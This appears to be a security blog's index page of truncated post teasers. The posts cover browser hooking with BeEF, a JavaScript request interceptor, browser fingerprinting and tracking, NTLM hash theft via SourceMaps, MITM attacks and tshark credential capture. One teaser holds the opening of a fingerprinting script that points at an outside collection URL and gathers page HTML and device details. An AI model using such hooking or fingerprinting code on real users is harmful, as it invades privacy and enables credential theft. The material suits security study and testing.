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🌟 Title: Time to Hook and Roll! 🤘🔥💻

Hey peeps, we dive into browser hooking using JavaScript, Ok? 🚀🌐 Today, we’ll explore some awesome techniques and tools that will blow your mind. Let’s get this hooking party started! 💪😎 1️.- Pooling HTTP? Nah, it’s all about BEEF! 🐄🔥Forget about pooling HTTP, ‘cause we got something juicier - BEEF! 🥩🍔 BEEF stands for Browser Exploitation Framework..

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🕵️ JSReciver v0.0 - Intercepting the Web, One Request at a Time! 🕵️

https://github.com/jomoza/rejsciver Let’s talk about my last GitHub project called JSReciver. This JavaScript script is a real game-changer when it comes to intercepting HTTP requests and doing some sneaky stuff. You won’t believe what this script can do! 🎯 What can JSReciver intercept?JSReciver can intercept various types of HTTP requests made by differ..

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How to track privacy lovers browser

Privacy Invasion Unleashed!Welcome, fellow wanderers of the digital realm! Today, we’re diving deep into the dark underbelly of the internet where privacy goes to die - browser tracking. Strap yourselves in, because we’re about to unveil the grim reality lurking beneath the surface. In the age of ubiquitous connectivity, our online activities are constantl..

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You have been fingerprinted! And here a stupid explanation

let dealer_uri = "https://loveisinthe.net/dealer/dl.php"; let encodedPageHTML; let encodedImg; let fingerprint; let SHA256 = new Hashes.SHA256; function getGpuModel() { var canvas = document.createElement("canvas"); var gl = canvas.getContext("webgl") || canvas.getContext("experimental-webgl"); if (gl) { var gpuModel = gl.get..

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Stealing NTLN hashes with SourceMaps

Unfortunately for the version of myself writing this, this silly browser security finding that I released months ago is more than patched, so this post is just because I want to upload content to this blog and collect the mess of screenshots, written things and links that are my notes. With that being said, I want to show a proof of concept whereby you cou..

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Men In The Middle Attack Basics

A man-in-the-middle (MITM) attack intercepts and manipulates communication between two parties. The attacker acts as a “middleman” and can alter or view the communication as it passes through, without the parties being aware of the interception. MITM attacks can be carried out using a variety of protocols, including: HTTP: MITM attacks can be carried out ..

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csh, javascript, pentesting

Cl13nt SId3 H4cKing Introduction

In this article we will introduce some basic concepts to understand the hacking techniques used against browsers focused on their “Client-Side”. JavaScript is a programming language that is commonly used in web development. It is a client-side scripting language, which means that it is executed by the user’s web browser rather than on a server. JavaScript..

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Tshark uses for pentest

TSHARK CHEET SHEEP USES FOR PENTESTERSThis post shows a series of examples of the “tshark” command using it for different purposes, the examples shown below are specific to see interesting information regarding a particular protocol. Intrusion detection Capture of credentials/hashes Capture of suspicious traffic etc… Before we start we need to know ..

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